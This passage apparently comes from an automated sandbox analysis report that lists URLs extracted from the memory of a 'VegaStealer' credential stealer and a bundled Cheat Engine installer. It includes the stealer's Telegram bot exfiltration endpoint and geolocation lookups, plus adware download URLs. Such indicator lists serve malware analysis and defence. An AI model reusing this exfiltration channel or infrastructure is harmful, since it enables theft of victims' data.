                                  Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: CheatEngine75.tmp, 00000008.00000003.2453634826.0000000004D69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/FbN
                                  Source: CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/IN
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/l
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net/qb
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.png
                                  Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443//WebAdvisor/images/943/EN.pngxgh
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/bdp
                                  Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/g
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d31tu1fsc224h4.cloudfront.net:443/gd
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/K
                                  Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.00000000035F9000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/
                                  Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3310876008.00000000074EF000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/CheatEngine/1032/CheatEngine75.exe
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.png
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/RAV_Triple_NCB/images/DOTPS-855/EN.pnge
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zip
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zip.png
                                  Source: CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipM32
                                  Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipa_re
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/files/969/WZSetup.zipjy
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.png
                                  Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzip)yH
                                  Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WeatherZero/images/969/EN.pngzipMSSP
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zip
                                  Source: CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipEN.png4
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipTEM32-xL
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005C90000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3038925703.0000000005C94000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipW
                                  Source: CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipWyx
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zipp.png4
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/files/1489/saBSI.zippM32-xL
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B40000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/images/943/EN.png
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000AAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/f/WebAdvisor/images/943/EN.pngZV
                                  Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.000000000363F000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/o
                                  Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/x
                                  Source: CheatEngine75.exe, 00000006.00000002.3278514154.00000000021FC000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2045039146.0000000002530000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3303385226.0000000004E30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2070425658.0000000003490000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3292808652.000000000351C000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000C50000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3297816445.0000000003634000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000D7A000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/zbd
                                  Source: CheatEngine75.tmp, 00000008.00000002.3308240431.0000000005CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net/zbd:N
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/f/RAV_Triple_NCB/images/DOTPS-855/EN.pngg
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/f/WeatherZero/images/969/EN.png
                                  Source: CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbd
                                  Source: CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbd:NvMUsers
                                  Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdWgI
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdk5fi.cloudfront.net:443/zbdv
                                  Source: CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d34hwk9wxgk5fi.cloudfront.net:443/zbdv
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                  Source: v2.exe, 00000007.00000002.2183338634.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, tmpDFE9.tmp.dat.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://freegeoip.app/xml/
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://freegeoip.app/xml/9https://api.telegram.org/botGhttps://api.vimeworld.ru/user/name/1--------
                                  Source: powershell.exe, 0000002B.00000002.2367950222.00000265BFF68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2030549327.0000000003528000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/novotnyllc/bc-csharp
                                  Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DBA71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://home.mcafee.com/Root/AboutUs.aspx?id=eula
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipbase.com
                                  Source: v2.exe, 00000007.00000002.2163857464.0000000002E77000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipbase.com/xml/
                                  Source: CheatEngine75.exe, 00000006.00000000.2043231186.0000000000401000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 0000000D.00000002.2259468035.000002505C180000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAFF0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2304202480.000002D7DC737000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2444174666.000002D7EAEBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2582149482.00000265CFDAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                                  Source: powershell.exe, 0000001F.00000002.2304202480.000002D7DC44C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                                  Source: CheatEngine75.tmp, 00000008.00000002.3310876008.000000000755F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policies
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policies67r
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policiesa.i
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004E0E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policiesm/rsSt
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policiesm/rsStubActivator.exeages/969/EN.pngzip)yH
                                  Source: CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2603574226.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reasonlabs.com/policiesx
                                  Source: CheatEngine75.exe, 00000006.00000003.2066216365.000000007FE35000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.exe, 00000006.00000003.2060824018.0000000002968000.00000004.00001000.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3037021671.0000000004E1C000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.3252221686.0000000005A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3300578552.0000000004D7B000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe
                                  Source: CheatEngine75.tmp, 00000008.00000002.3310876008.000000000758A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe.
                                  Source: CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exe/jH
                                  Source: CheatEngine75.tmp, 00000008.00000002.3286934906.0000000000CE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exeles/969/WZSetup.zip
                                  Source: CheatEngine75.tmp, 00000008.00000003.2793704683.0000000004D7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://shield.reasonsecurity.com/rsStubActivator.exem
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://steamcommunity.com/profiles/ASOFTWARE
                                  Source: System.Data.SQLite.Linq.dll.5.drString found in binary or memory: https://system.data.sqlite.org/
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2040306381.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2187538856.00000000059F4000.00000002.00000001.01000000.0000000C.sdmp, System.Data.SQLite.dll.5.drString found in binary or memory: https://system.data.sqlite.org/X
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031A6000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002EDD000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.00000000031FA000.00000004.00000800.00020000.00000000.sdmp, v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/VegaStealer_bot
                                  Source: VegaStealer_v2.exe, 00000005.00000003.2042743965.0000000003071000.00000004.00000020.00020000.00000000.sdmp, v2.exe, 00000007.00000000.2043530028.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: https://t.me/VegaStealer_bot-/sendDocument?chat_id=
                                  Source: System.Data.SQLite.dll.5.drString found in binary or memory: https://urn.to/r/sds_see
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcompanion.com/privacy
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcompanion.com/privacys/
                                  Source: CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B3F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcompanion.com/terms
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141238113.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B0F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://webcompanion.com/terms5/=
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.:wY
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.c
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.co
                                  Source: CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.avast.co_w
